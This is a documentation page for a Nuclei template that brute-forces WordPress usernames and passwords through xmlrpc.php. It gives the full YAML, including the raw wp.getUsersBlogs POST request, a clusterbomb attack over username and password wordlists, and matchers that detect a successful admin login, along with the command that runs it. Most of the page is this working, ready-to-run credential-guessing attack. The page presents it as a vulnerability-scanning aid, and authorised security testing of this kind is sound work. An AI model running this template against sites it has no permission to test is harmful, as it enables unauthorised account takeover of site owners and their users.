Wordpress XMLRPC.php username and password Bruteforcer
ID: wordpress-xmlrpc-brute-force
Severity: high
Author: Exid
Tags: wordpress,php,xmlrpc,fuzz
Description
Section titled “Description”This template bruteforces username and passwords through xmlrpc.php being available.
YAML Source
Section titled “YAML Source”id: wordpress-xmlrpc-brute-force
info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid severity: high description: This template bruteforces username and passwords through xmlrpc.php being available. reference: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ metadata: max-request: 276 tags: wordpress,php,xmlrpc,fuzz
http: - raw: - | POST /xmlrpc.php HTTP/1.1 Host: {{Hostname}} Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param> <value>{{username}}</value> </param> <param> <value>{{password}}</value> </param> </params> </methodCall>
attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt
matchers-condition: and matchers: - type: status status: - 200
- type: word part: body words: - 'url' - 'xmlrpc' - 'isAdmin' condition: and# digest: 4b0a00483046022100839dceeff1c99ab99987775bf0dd1b1e49484f04ee2dfcaad2efe50cc5e4664b0221008dd04e8a60479668c3a4376bf529be55ee6f0ebce8d2fdc2513ebd0201011fd9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml"